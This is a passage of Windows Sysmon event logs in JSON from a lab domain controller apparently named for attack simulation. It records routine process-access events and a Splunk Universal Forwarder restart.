07:55:27.858","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2909,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2910,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2911,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2912,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2913,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2914,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.858\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-0010A7360500}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.858","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-0010A7360500}","TargetProcessId":"2440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2915,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.874\r\nProcessGuid: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nProcessId: 2584\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nFileVersion: 8.0.2\r\nDescription: splunk Application\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3\r\nParentProcessGuid: {41C8662E-1FEF-5F25-0000-0010A7360500}\r\nParentProcessId: 2440\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2488","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.874","ProcessGuid":"{41C8662E-1FEF-5F25-0000-00106D380500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","FileVersion":"8.0.2","Description":"splunk Application","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\" restart --waitonpid=2488","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3","ParentProcessGuid":"{41C8662E-1FEF-5F25-0000-0010A7360500}","ParentProcessId":"2440","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"splunk _relaunch restart --accept-license --answer-yes --no-prompt --waitonpid=2488","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2916,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1FEF-5F25-0000-0010A7360500}\r\nSourceProcessId: 2440\r\nSourceThreadId: 2952\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nTargetProcessGUID: {41C8662E-1FEF-5F25-0000-00106D380500}\r\nTargetProcessId: 2584\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40f97|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d40f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:27.873","SourceProcessGUID":"{41C8662E-1FEF-5F25-0000-0010A7360500}","SourceProcessId":"2440","SourceThreadId":"2952","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","TargetProcessGUID":"{41C8662E-1FEF-5F25-0000-00106D380500}","TargetProcessId":"2584","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\Splunk.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4022c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+40f97|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+d40f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+1adfc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe+4cf68|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2917,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:27.873\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: 